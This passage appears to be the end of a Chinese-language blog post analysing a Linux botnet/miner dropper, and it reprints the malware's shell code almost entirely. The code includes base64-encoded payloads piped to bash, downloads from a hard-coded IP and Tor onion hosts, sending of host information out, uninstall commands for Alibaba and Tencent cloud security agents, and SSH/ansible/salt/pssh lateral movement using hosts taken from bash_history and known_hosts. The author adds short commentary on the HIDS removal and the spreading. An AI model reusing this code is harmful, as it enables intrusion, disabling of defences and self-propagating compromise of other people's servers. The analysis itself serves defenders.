ZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOnKICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMK|base64 -d|bash crontab -l || yum -y install cron crontab -l || yum -y install cronie crontab -l || apt-get update && apt-get -y install cron /usr/local/share/assist-daemon/assist_daemon --stop /usr/local/share/assist-daemon/assist_daemon --delete /usr/local/qcloud/monitor/barad/admin/uninstall.sh /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /etc/init.d/aegis uninstall systemctl stop aliyun systemctl disable aliyun systemctl start cron systemctl enable cron systemctl start crond systemctl enable crond rm -rf /usr/loca/qcloud/ /usr/local/aegis/ /usr/local/share/assist-daemon/ /usr/local/share/aliyun-assist/ /usr/sbin/aliyun-service /usr/sbin/aliyun_installer /etc/systemd/system/aliyun.service } issh() { ansible all -m shell -a 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash' knife ssh 'name:*' 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash' salt '*' cmd.run 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash' pssh 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash' hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |grep -v ^127.|awk -F: {'print $2'}|sort|uniq) for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l root $h 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash';done for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l $USER $h 'echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash';done } ibot() { f=/bot r=$(curl -4fsSLk ip.sb||wget -4qO- ip.sb||curl -4fsSLk checkip.amazonaws.com)_$(whoami)_$(uname -m)_$(uname -n)_$(crontab -l|base64 -w0) $c -x socks5h://$s:9050 -e$r $t.onion$f || $c -e$r $1$f } iscn() { pkill -9 -f tracepath f=/trc x=./$(date|md5sum|cut -f1 -d-) $c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x chmod +x $x;$x;rm -f $x } sockz fexe isys issh & ibot $t.tor2web.in || ibot $t.tor2web.it iscn $t.tor2web.in || iscn $t.tor2web.it

这里面的 isys 试图卸载国内的的阿里云和腾讯云的 HIDS，但是却没有看到针对国外的厂商的 HIDS 的卸载程序。 这说明攻击者要么是国人，只了解国内的情况，要么攻击目标是国内的机器。

但是看到有很多篇英文的分析文章，说明这个攻击者还是要攻击国外的机器的。

那么为什么只卸载国内云服务器的 HIDS 呢，那我不知道了。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 isys() { echo ZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOnKICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMK|base64 -d|bash crontab -l || yum -y install cron crontab -l || yum -y install cronie crontab -l || apt-get update && apt-get -y install cron /usr/local/share/assist-daemon/assist_daemon --stop /usr/local/share/assist-daemon/assist_daemon --delete /usr/local/qcloud/monitor/barad/admin/uninstall.sh /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /etc/init.d/aegis uninstall systemctl stop aliyun systemctl disable aliyun systemctl start cron systemctl enable cron systemctl start crond systemctl enable crond rm -rf /usr/loca/qcloud/ /usr/local/aegis/ /usr/local/share/assist-daemon/ /usr/local/share/aliyun-assist/ /usr/sbin/aliyun-service /usr/sbin/aliyun_installer /etc/systemd/system/aliyun.service }

issh函数通过 ssh横向移动。 如果机器上有已经配置好的 ansible、pssh、salt、knife 等自动化运维工具，该恶意程序还会尝试利用他们进行横向移动。除此之外，攻击者还从 bash 的历史 ssh 记录里面尝试登录远程设备。

跋

攻击者看起来是花了一些精力来研究如何绕过 HIDS 和 NIDS 的，恶意木马至今还有一部分是免杀的，此外还通过 IaC 工具扩大自己的战果，如此看来攻击者还是很厉害的，虽然没有做太多的对抗，但是他横向移动的技术值得红队人员学习 :)

分析大概就写这么多吧。

又是一篇流水账，没有重点，缺乏组织的意识流形式的文章。

我觉得这样不好，还得多学习学习怎样行文才能结构紧凑，言之有物。

看起来应该在本文的基础上修改几遍应该是可以改出来的。

不过吧，这不是写作业，没人评分，但是读者读起来可能比较费劲。

大段的代码，没有介绍基础知识，溯源思路没有表达清楚，大段的原始冗余重复的代码，缺乏图片描述，彼此关系不清，没有 Linux 基础的人可能很难看懂，能看懂的可能也很难坚持看这无聊的文章到结尾，最后此文可能就变成了我的备忘录 :(

想了想，我下次还是得认真思考一下怎么表达才能比较清楚了。

这一篇就算了，就写这样了吧。

哎，就是玩。

鸣谢：

• 曾大佬
• 矫哥

Les1ie

